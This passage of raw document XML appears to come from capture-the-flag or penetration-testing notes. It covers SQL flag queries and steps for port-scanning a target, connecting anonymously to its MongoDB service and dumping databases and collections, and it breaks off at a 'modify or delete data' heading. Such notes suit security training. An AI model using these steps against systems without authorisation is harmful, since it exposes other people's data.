        <w:t xml:space="preserve">SELECT * FROM flags;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt; WHERE &lt;column&gt; LIKE '%flag%';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE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AE6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o7tl24r61aob" w:id="221"/>
      <w:bookmarkEnd w:id="221"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usually found on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">27017</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so you will have to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan all ports to find it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Collections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Documents (key and value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to download the MongoDB shell utility:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloading the following tar archive file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -O https://downloads.mongodb.com/compass/mongosh-2.3.2-linux-x64.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -O option in curl stands for "remote file output", and it tells curl to save the downloaded file with its original name from the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We must then extract the contents of the tar archive file using the tar utility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar xvf mongosh-2.3.2-linux-x64.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the location where the mongosh binary is present</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~/mongosh-2.3.2-linux-x64/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's now try to connect to the MongoDB server running on the remote host as an anonymous user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./mongosh mongodb://{target_IP}:27017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the MongoDB Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If MongoDB is running on the target and port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">27017</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is open:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the location where the mongosh binary is present</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~/mongosh-2.3.2-linux-x64/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect to MongoDB using the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./mongosh mongodb://{target_IP}:27017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interact with the database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all databases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to a specific database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="993"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use &lt;database-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all collections (tables) in the database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="737"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show collections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Query data in a collection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1389"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.find()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1389"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.find().pretty()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1389"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this if you want format the output to make it easier to read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify or delete data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
